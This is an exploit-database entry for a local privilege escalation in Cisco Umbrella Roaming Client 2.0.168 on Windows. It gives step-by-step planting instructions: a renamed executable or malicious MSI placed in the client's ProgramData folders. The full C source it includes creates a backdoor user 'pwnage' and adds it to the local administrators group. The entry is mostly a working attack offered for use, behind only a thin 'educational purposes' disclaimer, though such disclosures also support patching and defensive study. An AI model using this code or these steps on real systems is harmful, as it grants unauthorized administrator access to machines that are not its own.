Exploits / Vulnerability Discovered : 2018-09-06 |
Type : local |
Platform : windows_x86-64
This exploit / vulnerability Cisco umbrella roaming client 2.0.168 local privilege escalation is for educational purposes only and if it is used you will do on your own risk!
Details:
Compile the following code and rename it to either netsh.exe or cmd.exe
and place the file in the "C:\ProgramData\OpenDNS\ERC\" directory. Restart the machine!
More Details:
Create malicious MSI file named RoamingClient_WIN_2.0.168.msi and place in
"C:\ProgramData\OpenDNS\ERC\Upgrades\" and restart the machine.
Tools Used:
ìAdvanced Installer 14.8" - Used to create the MSI
Code:
*/
#include <stdlib.h>
#include <stdio.h>
int main()
{
system("net user pwnage pwnage /add");
system("net localgroup administrators pwnage /add");
FILE * fp;
int i;
/* open the file for writing*/
fp = fopen ("c:\\opendns_pwnage.txt","w");
fprintf (fp, "OpenDNS has been Pwned... New user has been created as an admin!\nBrought to you by paragonsec @criticalstart");
/* close the file*/
fclose (fp);
return 0;
}
Cisco umbrella roaming client 2.0.168 local privilege escalation